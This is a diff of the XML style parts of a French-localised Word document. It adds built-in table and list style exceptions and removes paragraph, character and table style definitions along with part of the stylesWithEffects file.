+    <w:lsdException w:name="Medium List 2 Accent 4" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 4" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 4" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 4" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 4" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 4" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 4" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 4" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 5" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 5" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 5" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 5" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 5" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 5" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2 Accent 5" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 5" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 5" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 5" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 5" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 5" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 5" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 5" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 6" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 6" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 6" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 6" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 6" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 6" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2 Accent 6" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 6" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 6" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 6" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 6" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 6" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 6" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 6" w:uiPriority="73"/>
+    <w:lsdException w:name="Subtle Emphasis" w:uiPriority="19" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Emphasis" w:uiPriority="21" w:qFormat="1"/>
+    <w:lsdException w:name="Subtle Reference" w:uiPriority="31" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Reference" w:uiPriority="32" w:qFormat="1"/>
+    <w:lsdException w:name="Book Title" w:uiPriority="33" w:qFormat="1"/>
+    <w:lsdException w:name="Bibliography" w:semiHidden="1" w:uiPriority="37" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="TOC Heading" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="Plain Table 1" w:uiPriority="41"/>
+    <w:lsdException w:name="Plain Table 2" w:uiPriority="42"/>
+    <w:lsdException w:name="Plain Table 3" w:uiPriority="43"/>
+    <w:lsdException w:name="Plain Table 4" w:uiPriority="44"/>
+    <w:lsdException w:name="Plain Table 5" w:uiPriority="45"/>
+    <w:lsdException w:name="Grid Table Light" w:uiPriority="40"/>
+    <w:lsdException w:name="Grid Table 1 Light" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 1" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 1" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 1" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 1" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 1" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 1" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 1" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 2" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 2" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 2" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 2" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 2" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 2" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 2" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 3" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 3" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 3" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 3" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 3" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 3" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 3" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 4" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 4" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 4" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 4" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 4" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 4" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 4" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 5" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 5" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 5" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 5" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 5" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 5" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 5" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 6" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2 Accent 6" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3 Accent 6" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4 Accent 6" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark Accent 6" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful Accent 6" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful Accent 6" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 1" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 1" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 1" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 1" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 1" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 1" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 1" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 2" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 2" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 2" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 2" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 2" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 2" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 2" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 3" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 3" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 3" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 3" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 3" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 3" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 3" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 4" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 4" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 4" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 4" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 4" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 4" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 4" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 5" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 5" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 5" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 5" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 5" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 5" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 5" w:uiPriority="52"/>
+    <w:lsdException w:name="List Table 1 Light Accent 6" w:uiPriority="46"/>
+    <w:lsdException w:name="List Table 2 Accent 6" w:uiPriority="47"/>
+    <w:lsdException w:name="List Table 3 Accent 6" w:uiPriority="48"/>
+    <w:lsdException w:name="List Table 4 Accent 6" w:uiPriority="49"/>
+    <w:lsdException w:name="List Table 5 Dark Accent 6" w:uiPriority="50"/>
+    <w:lsdException w:name="List Table 6 Colorful Accent 6" w:uiPriority="51"/>
+    <w:lsdException w:name="List Table 7 Colorful Accent 6" w:uiPriority="52"/>
+    <w:lsdException w:name="Mention" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Smart Hyperlink" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Hashtag" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Unresolved Mention" w:semiHidden="1" w:unhideWhenUsed="1"/>
   </w:latentStyles>
   <w:style w:type="paragraph" w:default="1" w:styleId="Normal">
     <w:name w:val="Normal"/>
@@ -20360,501 +20810,7 @@
   <w:style w:type="character" w:default="1" w:styleId="Policepardfaut">
     <w:name w:val="Default Paragraph Font"/>
     <w:uiPriority w:val="1"/>
-    <w:unhideWhenUsed/>
-  </w:style>
-  <w:style w:type="table" w:default="1" w:styleId="TableauNormal">
-    <w:name w:val="Normal Table"/>
-    <w:uiPriority w:val="99"/>
     <w:semiHidden/>
-    <w:unhideWhenUsed/>
-    <w:tblPr>
-      <w:tblInd w:w="0" w:type="dxa"/>
-      <w:tblCellMar>
-        <w:top w:w="0" w:type="dxa"/>
-        <w:left w:w="108" w:type="dxa"/>
-        <w:bottom w:w="0" w:type="dxa"/>
-        <w:right w:w="108" w:type="dxa"/>
-      </w:tblCellMar>
-    </w:tblPr>
-  </w:style>
-  <w:style w:type="numbering" w:default="1" w:styleId="Aucuneliste">
-    <w:name w:val="No List"/>
-    <w:uiPriority w:val="99"/>
-    <w:semiHidden/>
-    <w:unhideWhenUsed/>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Sansinterligne">
-    <w:name w:val="No Spacing"/>
-    <w:link w:val="SansinterligneCar"/>
-    <w:uiPriority w:val="1"/>
-    <w:qFormat/>
-    <w:rsid w:val="00236FF1"/>
-    <w:pPr>
-      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-    </w:pPr>
-    <w:rPr>
-      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
-      <w:lang w:eastAsia="fr-FR"/>
-    </w:rPr>
-  </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="SansinterligneCar">
-    <w:name w:val="Sans interligne Car"/>
-    <w:basedOn w:val="Policepardfaut"/>
-    <w:link w:val="Sansinterligne"/>
-    <w:uiPriority w:val="1"/>
-    <w:rsid w:val="00236FF1"/>
-    <w:rPr>
-      <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
-      <w:lang w:eastAsia="fr-FR"/>
-    </w:rPr>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Textedebulles">
-    <w:name w:val="Balloon Text"/>
-    <w:basedOn w:val="Normal"/>
-    <w:link w:val="TextedebullesCar"/>
-    <w:uiPriority w:val="99"/>
-    <w:semiHidden/>
-    <w:unhideWhenUsed/>
-    <w:rsid w:val="00236FF1"/>
-    <w:pPr>
-      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-    </w:pPr>
-    <w:rPr>
-      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
-      <w:sz w:val="16"/>
-      <w:szCs w:val="16"/>
-    </w:rPr>
-  </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="TextedebullesCar">
-    <w:name w:val="Texte de bulles Car"/>
-    <w:basedOn w:val="Policepardfaut"/>
-    <w:link w:val="Textedebulles"/>
-    <w:uiPriority w:val="99"/>
-    <w:semiHidden/>
-    <w:rsid w:val="00236FF1"/>
-    <w:rPr>
-      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
-      <w:sz w:val="16"/>
-      <w:szCs w:val="16"/>
-    </w:rPr>
-  </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="Titre1Car">
-    <w:name w:val="Titre 1 Car"/>
-    <w:basedOn w:val="Policepardfaut"/>
-    <w:link w:val="Titre1"/>
-    <w:uiPriority w:val="9"/>
-    <w:rsid w:val="00236FF1"/>
-    <w:rPr>
-      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
-      <w:b/>
-      <w:bCs/>
-      <w:color w:val="365F91" w:themeColor="accent1" w:themeShade="BF"/>
-      <w:sz w:val="28"/>
-      <w:szCs w:val="28"/>
-    </w:rPr>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="En-ttedetabledesmatires">
-    <w:name w:val="TOC Heading"/>
-    <w:basedOn w:val="Titre1"/>
-    <w:next w:val="Normal"/>
-    <w:uiPriority w:val="39"/>
-    <w:semiHidden/>
-    <w:unhideWhenUsed/>
-    <w:qFormat/>
-    <w:rsid w:val="00236FF1"/>
-    <w:pPr>
-      <w:outlineLvl w:val="9"/>
-    </w:pPr>
-    <w:rPr>
-      <w:lang w:eastAsia="fr-FR"/>
-    </w:rPr>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Paragraphedeliste">
-    <w:name w:val="List Paragraph"/>
-    <w:basedOn w:val="Normal"/>
-    <w:uiPriority w:val="34"/>
-    <w:qFormat/>
-    <w:rsid w:val="00236FF1"/>
-    <w:pPr>
-      <w:ind w:left="720"/>
-      <w:contextualSpacing/>
-    </w:pPr>
-  </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="Titre2Car">
-    <w:name w:val="Titre 2 Car"/>
-    <w:basedOn w:val="Policepardfaut"/>
-    <w:link w:val="Titre2"/>
-    <w:uiPriority w:val="9"/>
-    <w:rsid w:val="00141610"/>
-    <w:rPr>
-      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
-      <w:b/>
-      <w:bCs/>
-      <w:color w:val="4F81BD" w:themeColor="accent1"/>
-      <w:sz w:val="26"/>
-      <w:szCs w:val="26"/>
-    </w:rPr>
-  </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="Titre3Car">
-    <w:name w:val="Titre 3 Car"/>
-    <w:basedOn w:val="Policepardfaut"/>
-    <w:link w:val="Titre3"/>
-    <w:uiPriority w:val="9"/>
-    <w:rsid w:val="00141610"/>
-    <w:rPr>
-      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
-      <w:b/>
-      <w:bCs/>
-      <w:color w:val="4F81BD" w:themeColor="accent1"/>
-    </w:rPr>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="TM1">
-    <w:name w:val="toc 1"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
-    <w:autoRedefine/>
-    <w:uiPriority w:val="39"/>
-    <w:unhideWhenUsed/>
-    <w:rsid w:val="00DA5B49"/>
-    <w:pPr>
-      <w:spacing w:after="100"/>
-    </w:pPr>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="TM2">
-    <w:name w:val="toc 2"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
-    <w:autoRedefine/>
-    <w:uiPriority w:val="39"/>
-    <w:unhideWhenUsed/>
-    <w:rsid w:val="00DA5B49"/>
-    <w:pPr>
-      <w:spacing w:after="100"/>
-      <w:ind w:left="220"/>
-    </w:pPr>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="TM3">
-    <w:name w:val="toc 3"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
-    <w:autoRedefine/>
-    <w:uiPriority w:val="39"/>
-    <w:unhideWhenUsed/>
-    <w:rsid w:val="00DA5B49"/>
-    <w:pPr>
-      <w:spacing w:after="100"/>
-      <w:ind w:left="440"/>
-    </w:pPr>
-  </w:style>
-  <w:style w:type="character" w:styleId="Lienhypertexte">
-    <w:name w:val="Hyperlink"/>
-    <w:basedOn w:val="Policepardfaut"/>
-    <w:uiPriority w:val="99"/>
-    <w:unhideWhenUsed/>
-    <w:rsid w:val="00DA5B49"/>
-    <w:rPr>
-      <w:color w:val="0000FF" w:themeColor="hyperlink"/>
-      <w:u w:val="single"/>
-    </w:rPr>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="En-tte">
-    <w:name w:val="header"/>
-    <w:basedOn w:val="Normal"/>
-    <w:link w:val="En-tteCar"/>
-    <w:uiPriority w:val="99"/>
-    <w:unhideWhenUsed/>
-    <w:rsid w:val="008720A4"/>
-    <w:pPr>
-      <w:tabs>
-        <w:tab w:val="center" w:pos="4536"/>
-        <w:tab w:val="right" w:pos="9072"/>
-      </w:tabs>
-      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-    </w:pPr>
-  </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="En-tteCar">
-    <w:name w:val="En-tête Car"/>
-    <w:basedOn w:val="Policepardfaut"/>
-    <w:link w:val="En-tte"/>
-    <w:uiPriority w:val="99"/>
-    <w:rsid w:val="008720A4"/>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Pieddepage">
-    <w:name w:val="footer"/>
-    <w:basedOn w:val="Normal"/>
-    <w:link w:val="PieddepageCar"/>
-    <w:uiPriority w:val="99"/>
-    <w:unhideWhenUsed/>
-    <w:rsid w:val="008720A4"/>
-    <w:pPr>
-      <w:tabs>
-        <w:tab w:val="center" w:pos="4536"/>
-        <w:tab w:val="right" w:pos="9072"/>
-      </w:tabs>
-      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
-    </w:pPr>
-  </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="PieddepageCar">
-    <w:name w:val="Pied de page Car"/>
-    <w:basedOn w:val="Policepardfaut"/>
-    <w:link w:val="Pieddepage"/>
-    <w:uiPriority w:val="99"/>
-    <w:rsid w:val="008720A4"/>
-  </w:style>
-  <w:style w:type="paragraph" w:styleId="Lgende">
-    <w:name w:val="caption"/>
-    <w:basedOn w:val="Normal"/>
-    <w:next w:val="Normal"/>
-    <w:uiPriority w:val="35"/>
-    <w:unhideWhenUsed/>
-    <w:qFormat/>
-    <w:rsid w:val="00BF4CF1"/>
-    <w:pPr>
-      <w:spacing w:line="240" w:lineRule="auto"/>
-    </w:pPr>
-    <w:rPr>
-      <w:b/>
-      <w:bCs/>
-      <w:color w:val="4F81BD" w:themeColor="accent1"/>
-      <w:sz w:val="18"/>
-      <w:szCs w:val="18"/>
-    </w:rPr>
-  </w:style>
-</w:styles>
-</file>
-
-<file path=word/stylesWithEffects.xml><?xml version="1.0" encoding="utf-8"?>
-<w:styles xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14">
-  <w:docDefaults>
-    <w:rPrDefault>
-      <w:rPr>
-        <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-        <w:sz w:val="22"/>
-        <w:szCs w:val="22"/>
-        <w:lang w:val="fr-FR" w:eastAsia="en-US" w:bidi="ar-SA"/>
-      </w:rPr>
-    </w:rPrDefault>
-    <w:pPrDefault>
-      <w:pPr>
-        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
-      </w:pPr>
-    </w:pPrDefault>
-  </w:docDefaults>
-  <w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="1" w:defUnhideWhenUsed="1" w:defQFormat="0" w:count="267">
-    <w:lsdException w:name="Normal" w:semiHidden="0" w:uiPriority="0" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="heading 1" w:semiHidden="0" w:uiPriority="9" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="heading 2" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 3" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 4" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 5" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 6" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 7" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 8" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="heading 9" w:uiPriority="9" w:qFormat="1"/>
-    <w:lsdException w:name="toc 1" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 2" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 3" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 4" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 5" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 6" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 7" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 8" w:uiPriority="39"/>
-    <w:lsdException w:name="toc 9" w:uiPriority="39"/>
-    <w:lsdException w:name="caption" w:uiPriority="35" w:qFormat="1"/>
-    <w:lsdException w:name="Title" w:semiHidden="0" w:uiPriority="10" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Default Paragraph Font" w:uiPriority="1"/>
-    <w:lsdException w:name="Subtitle" w:semiHidden="0" w:uiPriority="11" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Strong" w:semiHidden="0" w:uiPriority="22" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Emphasis" w:semiHidden="0" w:uiPriority="20" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Table Grid" w:semiHidden="0" w:uiPriority="59" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Placeholder Text" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="No Spacing" w:semiHidden="0" w:uiPriority="1" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Light Shading" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Shading" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful List" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Colorful Grid" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Shading Accent 1" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light List Accent 1" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Light Grid Accent 1" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 1 Accent 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Shading 2 Accent 1" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium List 1 Accent 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Revision" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="List Paragraph" w:semiHidden="0" w:uiPriority="34" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Quote" w:semiHidden="0" w:uiPriority="29" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Intense Quote" w:semiHidden="0" w:uiPriority="30" w:unhideWhenUsed="0" w:qFormat="1"/>
-    <w:lsdException w:name="Medium List 2 Accent 1" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 1 Accent 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 2 Accent 1" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Medium Grid 3 Accent 1" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
-    <w:lsdException w:name="Dark List Accent 1" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
